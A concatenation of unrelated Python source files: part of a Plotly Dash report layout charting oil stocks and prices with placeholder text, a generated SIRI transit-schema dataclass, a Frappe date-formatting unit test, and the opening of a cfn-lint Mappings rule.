"color": color_1,
"width": 2,
},
mode="lines",
name="OECD commercial ex. US NGL & other",
visible=True,
),
go.Scatter(
x=chinaSpr[
"Non-OECD stocks ex. China SPR, x"
],
y=chinaSpr[
"Non-OECD stocks ex. China SPR, y"
],
line={
"color": color_2,
"width": 2,
},
mode="lines",
name="Non-OECD stocks ex. China SPR",
),
],
"layout": go.Layout(
annotations=[
{
"x": 12.0815219907062,
"y": 948.201438849,
"font": {
"size": 9
},
"showarrow": False,
"text": "GS forecast",
"xref": "x",
"yref": "y",
}
],
height=300,
autosize=True,
dragmode="zoom",
hovermode="closest",
legend={
"x": 0.0913178294574,
"y": -0.167832167832,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"size": 9
},
"orientation": "h",
},
margin={
"r": 10,
"t": 10,
"b": 0,
"l": 40,
"pad": 0,
},
shapes=[
{
"line": {
"color": "rgb(68, 68, 68)",
"dash": "dot",
"width": 1,
},
"type": "line",
"x0": 0.6541331802525385,
"x1": 0.6541331802525385,
"xref": "paper",
"y0": 0,
"y1": 1,
"yref": "paper",
}
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 10,
"range": [
-0.25,
15.5,
],
"showgrid": False,
"showline": False,
"tickfont": {
"size": 9
},
"ticktext": [
"1Q13",
"2Q13",
"3Q13",
"4Q13",
"1Q14",
"2Q14",
"3Q14",
"4Q14",
"1Q15",
"2Q15",
"3Q15E",
"4Q15E",
"1Q16E",
"2Q16E",
"3Q16E",
"4Q16E",
],
"tickvals": [
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
],
"title": "",
"type": "linear",
"zerolinecolor": "rgb(130, 132, 134)",
"zeroline": False,
"zerolinewidth": 1,
},
yaxis={
"autorange": False,
"nticks": 10,
"range": [
-800,
1000,
],
"showgrid": False,
"showline": True,
"tickfont": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
},
),
}
)
],
className="page-1i",
),
],
className="page-9b",
),
],
className="page-9c",
)
],
className="exibit six columns",
),
html.Div(
[
html.Div(
[
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
html.P(lorem.paragraph()),
],
className="page-2b",
)
],
className="five columns",
),
],
className="page-9d",
)
],
className="subpage",
)
],
className="page",
),
# Page 10
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Nulla diam conubia nec lacus urna in ligula nec ut egestas sed. Diam inceptos nec venenatis",
className="page-3h",
),
html.P(
"Nulla diam conubia nec lacus urna in ligula nec ut egestas sed",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=oecdIndustry[
"OECD industry stock changes , x"
],
y=oecdIndustry[
"OECD industry stock changes , y"
],
line={
"color": color_1
},
mode="lines",
name="OECD industry stock changes ",
),
go.Scatter(
x=oecdIndustry[
"IEA miscellaneous to balance (rhs), x"
],
y=oecdIndustry[
"IEA miscellaneous to balance (rhs), y"
],
line={
"color": color_2
},
mode="lines",
name="IEA miscellaneous to balance (rhs)",
yaxis="y2",
),
],
"layout": go.Layout(
height=250,
autosize=True,
hovermode="closest",
legend={
"x": 0.0913178294574,
"y": -0.167832167832,
"bgcolor": "rgba(255, 255, 255, 0)",
"orientation": "h",
},
margin={
"r": 30,
"t": 10,
"b": 0,
"l": 30,
},
shapes=[
{
"fillcolor": "rgba(31, 119, 180, 0)",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1997.25,
"x1": 1998.75,
"xref": "x",
"y0": -1713.7349397590363,
"y1": 2391.5662650602408,
"yref": "y",
},
{
"fillcolor": "rgba(31, 119, 180, 0)",
"layer": "above",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 2013.25,
"x1": 2014.75,
"xref": "x",
"y0": -1674.2105263157894,
"y1": 2286.315789473684,
"yref": "y",
},
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 30,
"range": [
1986,
2015,
],
"showgrid": False,
"showline": True,
# 'tickangle': "auto",
"tickfont": {
"size": 8
},
"tickprefix": "1Q",
"ticks": "outside",
"type": "linear",
"zeroline": True,
},
yaxis={
"autorange": False,
"nticks": 10,
"range": [
-2000,
2500,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"type": "linear",
},
yaxis2={
"anchor": "x",
"autorange": False,
"nticks": 12,
"overlaying": "y",
"range": [
-2500,
2500,
],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {
"size": 8
},
"ticks": "outside",
"type": "linear",
"zeroline": False,
},
),
}
)
]
),
],
className="thirdPage first row",
# style={"margin-top": "0px"},
)
] # className="page-9e"
),
html.Div(
[
html.Div(
[
html.Strong(
"Risus amet quam, eget, lacus, orci, dui facilisis dolor sodales arcu facilisi consectetur",
className="page-3h",
),
html.P(
"Diam, maximus ultricies neque adipiscing tellus eros proin",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=wtiOilprices[
"x"
],
y=wtiOilprices[
"y"
],
line={
"color": color_1
},
mode="lines",
name="WTI oil prices (S/bbl, 2015 $) ",
)
],
"layout": go.Layout(
height=250,
autosize=True,
hovermode="closest",
legend={
"x": 0.16818221960553428,
"y": -0.30969810073003856,
"bgcolor": "rgba(255, 255, 255, 0)",
},
margin={
"r": 10,
"t": 10,
"b": 40,
"l": 30,
},
shapes=[
{
"fillcolor": "rgba(31, 119, 180, 0)",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1985.6994029850746,
"x1": 1987.4587313432835,
"xref": "x",
"y0": 10,
"y1": 85,
"yref": "y",
},
{
"fillcolor": "rgba(31, 119, 180, 0)",
"layer": "above",
"line": {
"color": "rgb(255, 0, 0)",
"dash": "dash",
"width": 1,
},
"opacity": 1,
"type": "rect",
"x0": 1998.1650746268656,
"x1": 1999.989328358209,
"xref": "x",
"y0": 5,
"y1": 70,
"yref": "y",
},
],
showlegend=True,
xaxis={
"autorange": False,
"nticks": 24,
"range": [
1972,
2015.5,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"titlefont": {
"color": "rgb(92, 53, 143)"
},
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"nticks": 1,
"range": [
0,
180,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"type": "linear",
},
),
}
)
]
),
],
className="thirdPage first row",
)
],
className="page-2c",
),
],
className="page-2b",
),
html.Div(
[
html.Div(
[
html.Div(
[
html.Strong(
"Porttitor felis eget nibh quam duis et at a massa varius.",
className="page-3h",
),
html.P(
"Risus amet quam, eget, lacus, orci, dui facilisis ",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=productionCost[
"x"
],
y=productionCost[
"y"
],
line={
"color": color_1
},
mode="lines",
)
],
"layout": go.Layout(
height=200,
margin={
"r": 20,
"t": 10,
"b": 50,
"l": 40,
},
xaxis={
"autorange": False,
"exponentformat": "none",
"linecolor": "rgb(171, 172, 173)",
"nticks": 5,
"range": [
0,
40000,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Cumulative peak oil production (kb/d)",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"linecolor": "rgb(171, 172, 173)",
"nticks": 10,
"range": [
0,
45,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "Production cost (US$/bbl)",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": False,
},
),
}
)
]
),
],
className="six columns",
),
html.Div(
[
html.Strong(
"Arcu aenean litora quam dignissim penatibus sem ultrices",
className="page-3h",
),
html.P(
"Aenean ipsum nostra magna ut sagittis venenatis",
className="page-3k",
),
html.Div(
[
dcc.Graph(
figure={
"data": [
go.Scatter(
x=production2015[
"Canadian Producers, x"
],
y=production2015[
"Canadian Producers, y"
],
marker={
"color": "rgb(255, 0, 0)",
"symbol": "diamond",
},
mode="markers",
name="Canadian Producers",
visible=True,
),
go.Scatter(
x=production2015[
"US E&Ps and Integrated, x"
],
y=production2015[
"US E&Ps and Integrated, y"
],
marker={
"color": color_2,
"symbol": "diamond",
},
mode="markers",
name="US E&Ps and Integrated",
visible=True,
),
go.Scatter(
x=production2015[
"Others, x"
],
y=production2015[
"Others, y"
],
marker={
"color": color_1,
"symbol": "diamond",
},
mode="markers",
name="Others",
visible=True,
),
],
"layout": go.Layout(
height=200,
autosize=True,
hovermode="closest",
legend={
"x": -0.06,
"y": -0.36,
"font": {
"size": 9
},
"orientation": "h",
},
margin={
"r": 10,
"t": 10,
"b": 0,
"l": 40,
},
showlegend=True,
xaxis={
"autorange": False,
"nticks": 8,
"range": [
0,
100,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"ticksuffix": "%",
"titlefont": {
"size": 9
},
"title": "2015 Net Debt / Capital Employed",
"type": "linear",
"zeroline": False,
},
yaxis={
"autorange": False,
"nticks": 12,
"range": [
0,
45,
],
"showgrid": False,
"showline": True,
"tickfont": {
"size": 9
},
"ticks": "outside",
"title": "2015 Production Cost $/bbl",
"titlefont": {
"size": 9
},
"type": "linear",
"zeroline": True,
},
),
}
)
]
),
],
className="six columns",
),
],
className="thirdPage first row",
)
],
className="page-2c",
),
],
className="subpage",
)
],
className="page",
),
# Page 11
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"In tempor mauris non, maximus non odio. Lacus mi arcu, ut parturient ac sed curae \
sed litora amet quam, massa purus condimentum",
className="page-9h",
),
html.P(lorem.paragraph() * 2, className="page-9f"),
html.P(lorem.paragraph(), className="page-9g"),
html.P(lorem.paragraph() * 3, className="page-9f"),
],
className="twelve columns",
),
html.Div(
[
html.P(
"Non amet tempor pellentesque facilisis velit, dui nulla hendrerit sociosqu fusce",
className="page-9g",
),
dcc.Graph(
figure={
"data": [
go.Scatter(
x=energyShare[
"Energy share of HY Issuance, x"
],
y=energyShare[
"Energy share of HY Issuance, y"
],
marker={
"color": color_1,
"symbol": "diamond",
},
mode="lines",
name="Energy share of HY Issuance",
visible=True,
),
go.Scatter(
x=energyShare[
"US oil rig count (monthly change), x"
],
y=energyShare[
"US oil rig count (monthly change), y"
],
marker={
"color": color_2,
"symbol": "diamond",
},
mode="lines",
name="US oil rig count (monthly change)",
yaxis="y2",
),
],
"layout": go.Layout(
height=300,
autosize=True,
hovermode="closest",
legend={
"x": 0.39727646537238737,
"y": -0.12197967025477964,
"bgcolor": "rgba(255, 255, 255, 0)",
"font": {
"color": "rgb(68, 68, 68)",
"size": 9,
},
"orientation": "h",
"traceorder": "reversed",
},
margin={"r": 30, "t": 10, "b": 0, "l": 30},
showlegend=True,
xaxis={
"autorange": True,
"nticks": 10,
"range": [-0.007132542, 8.1854778101],
"showgrid": False,
"tickfont": {"size": 9},
"ticks": "",
"ticktext": [
" Jan-13",
" May-13",
" Sep-13",
" Jan-14",
" May-14",
" Sep-14",
" Jan-15",
" May-15",
],
"tickvals": [0, 1, 2, 3, 4, 5, 6, 7],
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
yaxis={
"autorange": False,
"linecolor": "rgb(136, 137, 140)",
"nticks": 10,
"range": [-300, 150],
"showgrid": False,
"showline": False,
"tickfont": {"size": 9},
"ticks": "outside",
"title": "",
"type": "linear",
"zeroline": True,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
yaxis2={
"anchor": "x",
"autorange": False,
"linecolor": "rgb(136, 137, 140)",
"nticks": 8,
"overlaying": "y",
"range": [0, 35],
"showgrid": False,
"showline": True,
"side": "right",
"tickfont": {"size": 9},
"ticks": "outside",
"ticksuffix": " %",
"type": "linear",
"zeroline": False,
"zerolinecolor": "rgb(171, 172, 173)",
"zerolinewidth": 1,
},
),
}
),
],
className="eleven columns",
),
],
className="subpage",
)
],
style={"margin-top": "50px"},
className="page",
),
# Page 12
html.Div(
[
html.Div(
[
html.Div(
[
html.Div(
[
html.H6(
"Erat cras porta inceptos nibh sociis justo. Natoque mauris nunc etiam, dis quam, tempor consectetur ac \
Pulvinar nunc vitae dui elit hac ante, facilisi, primis nascetur. Non nostra torquent ipsum ac amet",
className="page-9h",
),
html.P(lorem.paragraph(), className="page-1i"),
html.P(lorem.paragraph(), className="page-1i"),
html.H6(
"Ultrices phasellus dignissim, accumsan platea volutpat, sapien mi enim. Pharetra ipsum netus in turpis, \
lorem tempus et. Eget sed. Eu porta cum tempor convallis sed nostra, pellentesque eros.",
className="page-6c",
),
html.Div(
[
dash_table.DataTable(
data=adjustedSales.to_dict(
"records"
),
columns=[
{"id": c, "name": c}
for c in adjustedSales.columns
],
style_data_conditional=[
{
"if": {"row_index": "odd"},
"backgroundColor": color_b,
},
{
"if": {
"column_id": "Quarter"
},
"backgroundColor": color_2,
"color": "black",
},
],
style_header={
"backgroundColor": color_1,
"fontWeight": "bold",
"color": "white",
},
fixed_rows={"headers": True},
style_cell={"width": "150px"},
)
],
className="page-1i",
),
],
className="eleven columns",
)
],
className="page-12a",
)
],
className="subpage",
)
],
className="page",
),
]
)
if __name__ == "__main__":
app.run_server(debug=True)
|
from dataclasses import dataclass, field
from typing import List, Optional
from xsdata.models.datatype import XmlDateTime
from siri.siri_model.siri_facility_v2_0 import (
FacilityChangeElement,
FacilityConditionElement,
)
from siri.siri_model.siri_journey_support_v2_0 import (
FirstOrLastJourneyEnumeration,
FramedVehicleJourneyRefStructure,
)
from siri.siri_model.siri_journey_v2_0 import (
JourneyNote,
SimpleContactStructure,
ViaNameStructure,
)
from siri.siri_model.siri_reference_v2_0 import (
PublishedLineName,
VehicleModesEnumeration,
)
from siri.siri_model.siri_situation_identity_v1_1 import SituationRef
from siri.siri_utility.siri_types_v2_0 import (
NaturalLanguagePlaceNameStructure,
NaturalLanguageStringStructure,
)
from siri.siri_utility.siri_utility_v1_1 import Extensions
__NAMESPACE__ = "http://www.siri.org.uk/siri"
@dataclass
class InterchangeJourneyStructure:
"""
Type for feeder or Distributor Journey info about a VEHICLE JOURNEY.
:ivar line_ref: Reference to a LINE.
:ivar direction_ref: Reference to a DIRECTION, typically outward or
return.
:ivar framed_vehicle_journey_ref: A reference to the dated VEHICLE
JOURNEY that the VEHICLE is making.
:ivar journey_pattern_ref: Identifier of JOURNEY PATTERN that
journey follows.
:ivar journey_pattern_name: Name of Joruney Pattern
:ivar vehicle_mode: A means of transportation such as bus, rail,
etc.
:ivar route_ref: Identifier of ROUTE that journey follows.
:ivar published_line_name: Name or Number by which the LINE is known
to the public. (Unbounded since SIRI 2.0)
:ivar group_of_lines_ref: Reference to a GROUP OF LINEs to which
journey belongs. SIRI 2.0
:ivar direction_name: Description of the DIRECTION. May correspond
to a DESTINATION DISPLAY. (Unbounded since SIRI 2.0)
:ivar external_line_ref: Alternative identifier of LINE that an
external system may associate with journey.
:ivar operator_ref: OPERATOR of a VEHICLE JOURNEY. Note that the
operator may change over the course of a journey. This shoudl
show teh operator for the curent point in the journey. Use
Journey Parts tp record all the operators in the whole journeyh.
:ivar product_category_ref: Product Classification of VEHICLE
JOURNEY- subdivides a transport mode. e.g. express, loacl.
:ivar service_feature_ref: Classification of service into arbitrary
Service categories, e.g. school bus. Recommended SIRI values
based on TPEG are given in SIRI documentation and enumerated in
the siri_facilities package. Corresponds to NeTEX TYPE OF
SERVICe.
:ivar vehicle_feature_ref: Features of VEHICLE providing journey.
Recommended SIRI values based on TPEG are given in SIRI
documentation and enumerated in the siri_facilities package.
:ivar origin_ref:
:ivar origin_name: Name of the origin of the journey. (Unbounded
since SIRI 2.0)
:ivar origin_short_name: Short name of the origin of the journey;
used to help identify the VEHICLE JOURNEY on arrival boards. If
absent, same as Origin Name.
:ivar destination_display_at_origin: DIRECTION name shown for
joruney at the origin. +SIRI v2.0
:ivar via: Names of VIA points, used to help identify the LINE, for
example, Luton to Luton via Sutton. Currently 3 in VDV. Should
only be included if the detail level was requested.
:ivar destination_ref: Reference to a DESTINATION.
:ivar destination_name: Description of the destination stop (vehicle
signage), Can be overwritten for a journey, and then also
section by section by the entry in an individual CALl.
(Unbounded since SIRI 2.0)
:ivar destination_short_name: Short name of the DESTINATION.of the
journey; used to help identify the VEHICLE JOURNEY on arrival
boards. If absent, same as DestinationName. (Unbounded since
SIRI 2.0)
:ivar vehicle_journey_name: For train services with named journeys.
Train name, e.g. “West Coast Express”. If omitted: No train
name. Inherited property. (Unbounded since SIRI 2.0)
:ivar journey_note:
:ivar public_contact: Contact details for use by members of public.
+SIRI v2.0
:ivar operations_contact: Contact details for use by operational
staff. +SIRI v2.0
:ivar headway_service: Whether this is a Headway Service, that is
shown as operating at a prescribed interval rather than to a
fixed timetable. Default is 'false'.
:ivar origin_aimed_departure_time: Timetabled departure time from
Origin.
:ivar destination_aimed_arrival_time: Timetabled arrival time at
Destination.
:ivar first_or_last_journey:
:ivar facility_condition_element: Information about a change of
Equipment availabilti at stop or on vehicle that may affect
access or use.
:ivar facility_change_element:
:ivar situation_ref:
:ivar block_ref: BLOCK that VEHICLE is running.
:ivar course_of_journey_ref: COURSE OF JOURNEY ('Run') that VEHICLE
is running.
:ivar vehicle_journey_ref:
:ivar vehicle_ref:
:ivar additional_vehicle_journey_ref: Refercence to other VEHICLE
Journeys (+SIRI v2.0)
:ivar driver_ref: A reference to the DRIVER or Crew currently logged
in to operate a monitored VEHICLE. May be omitted if real-time
data is not available - i.e. it is timetabled data. +SIRI v2.0
:ivar driver_name: The name oo the Driver or Crew +SIRI v2.0
:ivar monitored: Whether there is real-time information available
for journey; if not present, not known.
:ivar aimed_departure_time: On a Distributor journey , a Timetabled
departure time of the VEHICLE JOURNEY from the CONNECTION LINK
for the SERVICE JOURNEY INTERCHANGE. On a Feeder journey a
Timetabled arrival time of the VEHICLE JOURNEY at the CONNECTION
link for the SERVICE JOURNEY INTERCHANGE.
:ivar extensions:
"""
line_ref: Optional[str] = field(
default=None,
metadata={
"name": "LineRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
"required": True,
},
)
direction_ref: Optional[str] = field(
default=None,
metadata={
"name": "DirectionRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
"required": True,
},
)
framed_vehicle_journey_ref: Optional[FramedVehicleJourneyRefStructure] = field(
default=None,
metadata={
"name": "FramedVehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_pattern_ref: Optional[str] = field(
default=None,
metadata={
"name": "JourneyPatternRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_pattern_name: Optional[NaturalLanguageStringStructure] = field(
default=None,
metadata={
"name": "JourneyPatternName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_mode: List[VehicleModesEnumeration] = field(
default_factory=list,
metadata={
"name": "VehicleMode",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
route_ref: Optional[str] = field(
default=None,
metadata={
"name": "RouteRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
published_line_name: List[PublishedLineName] = field(
default_factory=list,
metadata={
"name": "PublishedLineName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
group_of_lines_ref: Optional[str] = field(
default=None,
metadata={
"name": "GroupOfLinesRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
direction_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "DirectionName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
external_line_ref: Optional[str] = field(
default=None,
metadata={
"name": "ExternalLineRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
operator_ref: Optional[str] = field(
default=None,
metadata={
"name": "OperatorRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
product_category_ref: Optional[str] = field(
default=None,
metadata={
"name": "ProductCategoryRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
service_feature_ref: List[str] = field(
default_factory=list,
metadata={
"name": "ServiceFeatureRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_feature_ref: List[str] = field(
default_factory=list,
metadata={
"name": "VehicleFeatureRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_ref: Optional[str] = field(
default=None,
metadata={
"name": "OriginRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "OriginName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_short_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "OriginShortName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_display_at_origin: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "DestinationDisplayAtOrigin",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
via: List[ViaNameStructure] = field(
default_factory=list,
metadata={
"name": "Via",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_ref: Optional[str] = field(
default=None,
metadata={
"name": "DestinationRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "DestinationName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_short_name: List[NaturalLanguagePlaceNameStructure] = field(
default_factory=list,
metadata={
"name": "DestinationShortName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_journey_name: List[NaturalLanguageStringStructure] = field(
default_factory=list,
metadata={
"name": "VehicleJourneyName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
journey_note: List[JourneyNote] = field(
default_factory=list,
metadata={
"name": "JourneyNote",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
public_contact: Optional[SimpleContactStructure] = field(
default=None,
metadata={
"name": "PublicContact",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
operations_contact: Optional[SimpleContactStructure] = field(
default=None,
metadata={
"name": "OperationsContact",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
headway_service: Optional[bool] = field(
default=None,
metadata={
"name": "HeadwayService",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
origin_aimed_departure_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "OriginAimedDepartureTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
destination_aimed_arrival_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "DestinationAimedArrivalTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
first_or_last_journey: Optional[FirstOrLastJourneyEnumeration] = field(
default=None,
metadata={
"name": "FirstOrLastJourney",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
facility_condition_element: List[FacilityConditionElement] = field(
default_factory=list,
metadata={
"name": "FacilityConditionElement",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
facility_change_element: Optional[FacilityChangeElement] = field(
default=None,
metadata={
"name": "FacilityChangeElement",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
situation_ref: List[SituationRef] = field(
default_factory=list,
metadata={
"name": "SituationRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
block_ref: Optional[str] = field(
default=None,
metadata={
"name": "BlockRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
course_of_journey_ref: Optional[str] = field(
default=None,
metadata={
"name": "CourseOfJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_journey_ref: Optional[str] = field(
default=None,
metadata={
"name": "VehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
vehicle_ref: Optional[str] = field(
default=None,
metadata={
"name": "VehicleRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
additional_vehicle_journey_ref: List[FramedVehicleJourneyRefStructure] = field(
default_factory=list,
metadata={
"name": "AdditionalVehicleJourneyRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
driver_ref: Optional[str] = field(
default=None,
metadata={
"name": "DriverRef",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
driver_name: Optional[str] = field(
default=None,
metadata={
"name": "DriverName",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
monitored: Optional[bool] = field(
default=None,
metadata={
"name": "Monitored",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
aimed_departure_time: Optional[XmlDateTime] = field(
default=None,
metadata={
"name": "AimedDepartureTime",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
extensions: Optional[Extensions] = field(
default=None,
metadata={
"name": "Extensions",
"type": "Element",
"namespace": "http://www.siri.org.uk/siri",
},
)
|
# Copyright (c) 2019, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
import datetime
import unittest
import frappe
from frappe.utils import (
format_datetime,
format_time,
formatdate,
get_datetime,
get_time,
get_user_date_format,
get_user_time_format,
getdate,
)
test_date_obj = datetime.datetime.now()
test_date = test_date_obj.strftime("%Y-%m-%d")
test_time = test_date_obj.strftime("%H:%M:%S.%f")
test_datetime = test_date_obj.strftime("%Y-%m-%d %H:%M:%S.%f")
test_date_formats = {
"yyyy-mm-dd": test_date_obj.strftime("%Y-%m-%d"),
"dd-mm-yyyy": test_date_obj.strftime("%d-%m-%Y"),
"dd/mm/yyyy": test_date_obj.strftime("%d/%m/%Y"),
"dd.mm.yyyy": test_date_obj.strftime("%d.%m.%Y"),
"mm/dd/yyyy": test_date_obj.strftime("%m/%d/%Y"),
"mm-dd-yyyy": test_date_obj.strftime("%m-%d-%Y"),
}
test_time_formats = {
"HH:mm:ss": test_date_obj.strftime("%H:%M:%S"),
"HH:mm": test_date_obj.strftime("%H:%M"),
}
class TestFmtDatetime(unittest.TestCase):
"""Tests date, time and datetime formatters and some associated
utility functions. These rely on the system-wide date and time
formats.
"""
# Set up and tidy up routines
def setUp(self):
# create test domain
self.pre_test_date_format = frappe.db.get_default("date_format")
self.pre_test_time_format = frappe.db.get_default("time_format")
def tearDown(self):
frappe.db.set_default("date_format", self.pre_test_date_format)
frappe.db.set_default("time_format", self.pre_test_time_format)
frappe.local.user_date_format = None
frappe.local.user_time_format = None
frappe.db.rollback()
# Test utility functions
def test_set_default_date_format(self):
frappe.db.set_default("date_format", "ZYX321")
self.assertEqual(frappe.db.get_default("date_format"), "ZYX321")
def test_set_default_time_format(self):
frappe.db.set_default("time_format", "XYZ123")
self.assertEqual(frappe.db.get_default("time_format"), "XYZ123")
def test_get_functions(self):
# Test round-trip through getdate, get_datetime and get_time
self.assertEqual(test_date_obj, get_datetime(test_datetime))
self.assertEqual(test_date_obj.date(), getdate(test_date))
self.assertEqual(test_date_obj.time(), get_time(test_time))
# Test date formatters
def test_formatdate_forced(self):
# Test with forced date formats
self.assertEqual(formatdate(test_date, "dd-yyyy-mm"), test_date_obj.strftime("%d-%Y-%m"))
self.assertEqual(formatdate(test_date, "dd-yyyy-MM"), test_date_obj.strftime("%d-%Y-%m"))
def test_formatdate_forced_broken_locale(self):
# Test with forced date formats
lang = frappe.local.lang
# Force fallback from Babel
try:
frappe.local.lang = "FAKE"
self.assertEqual(formatdate(test_date, "dd-yyyy-mm"), test_date_obj.strftime("%d-%Y-%m"))
self.assertEqual(formatdate(test_date, "dd-yyyy-MM"), test_date_obj.strftime("%d-%Y-%m"))
finally:
frappe.local.lang = lang
def test_format_date(self):
# Test formatdate with various default date formats set
for fmt, valid_fmt in test_date_formats.items():
frappe.db.set_default("date_format", fmt)
frappe.local.user_date_format = None
self.assertEqual(get_user_date_format(), fmt)
self.assertEqual(formatdate(test_date), valid_fmt)
# Test time formatters
def test_format_time_forced(self):
# Test with forced time formats
self.assertEqual(format_time(test_time, "ss:mm:HH"), test_date_obj.strftime("%S:%M:%H"))
def test_format_time(self):
# Test format_time with various default time formats set
for fmt, valid_fmt in test_time_formats.items():
frappe.db.set_default("time_format", fmt)
frappe.local.user_time_format = None
self.assertEqual(get_user_time_format(), fmt)
self.assertEqual(format_time(test_time), valid_fmt)
# Test datetime formatters
def test_format_datetime_forced(self):
# Test with forced date formats
self.assertEqual(
format_datetime(test_datetime, "dd-yyyy-MM ss:mm:HH"),
test_date_obj.strftime("%d-%Y-%m %S:%M:%H"),
)
def test_format_datetime(self):
# Test formatdate with various default date formats set
for date_fmt, valid_date in test_date_formats.items():
frappe.db.set_default("date_format", date_fmt)
frappe.local.user_date_format = None
for time_fmt, valid_time in test_time_formats.items():
frappe.db.set_default("time_format", time_fmt)
frappe.local.user_time_format = None
valid_fmt = valid_date + " " + valid_time
self.assertEqual(format_datetime(test_datetime), valid_fmt)
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import six
from cfnlint.rules import CloudFormationLintRule
from cfnlint.rules import RuleMatch
class Configuration(CloudFormationLintRule):
"""Check if Mappings are configured correctly"""
id = 'E7001'
shortdesc = 'Mappings are appropriately configured'
description = 'Check if Mappings are properly configured'
